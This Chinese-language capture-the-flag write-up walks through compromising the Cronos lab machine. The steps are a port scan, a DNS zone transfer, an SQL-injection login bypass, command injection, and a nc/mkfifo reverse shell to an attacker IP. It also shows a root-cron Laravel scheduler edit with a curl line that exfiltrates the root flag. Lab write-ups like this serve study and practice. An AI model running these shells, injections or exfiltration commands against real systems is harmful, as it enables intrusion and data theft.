基本信息

端口扫描

22,53,80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ nmap -sC -sV 10.10.10.13
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-24 14:15 CST
Nmap scan report for 10.10.10.13
Host is up (0.069s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.37 seconds

DNS域传送

53端口dns服务存在dns域传送漏洞,初始域名需要简单猜一下,cronos.htb:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.10.6 <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 69 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Thu Dec 24 14:21:15 CST 2020
;; XFR size: 7 records (messages 1, bytes 203)

然后得到的域名加hosts:

1
10.10.10.13 cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb

admin.cronos.htb

应该是管理后台,需要登录:

sql注入

基础的sql注入,直接admin' or '1'='1就能进去:

命令注入

然后这功能一看就是基础的命令注入:

reverse shell

服务器有nc,没有-e选项,这种方式就可以:

1
2
3
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4445 >/tmp/f

python -c 'import pty; pty.spawn("/bin/bash")'

user flag

然后当前shell切换到用户目录,得到user.txt:

提权信息

直接上脚本搜集信息:

1
2
3
wget http://10.10.14.12:7777/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

很容易看到root权限的定时任务,每分钟执行一次/var/www/laravel/app/Console/Kernel.php中的schedule函数,而这个文件是我们可写的,根据文档,可以修改代码执行任意命令:

Kernel.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php

namespace App\Console;

use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;

class Kernel extends ConsoleKernel
{
    /**
     * The Artisan commands provided by your application.
     *
     * @var array
     */
    protected $commands = [
        //
    ];

    /**
     * Define the application's command schedule.
     *
     * @param  \Illuminate\Console\Scheduling\Schedule  $schedule
     * @return void
     */
    protected function schedule(Schedule $schedule)
    {
        // $schedule->command('inspire')
        //          ->hourly();
    }

    /**
     * Register the Closure based commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        require base_path('routes/console.php');
    }
}

提权 & root flag

直接覆盖文件,自定义命令,得到root.txt:

1
2
3
4
5
// $schedule->exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 4446 >/tmp/f')->everyMinute();
$schedule->exec("curl http://10.10.14.12:7777/`cat /root/root.txt`")->everyMinute();

rm Kernel.php
wget http://10.10.14.12:7777/Kernel.php

参考资料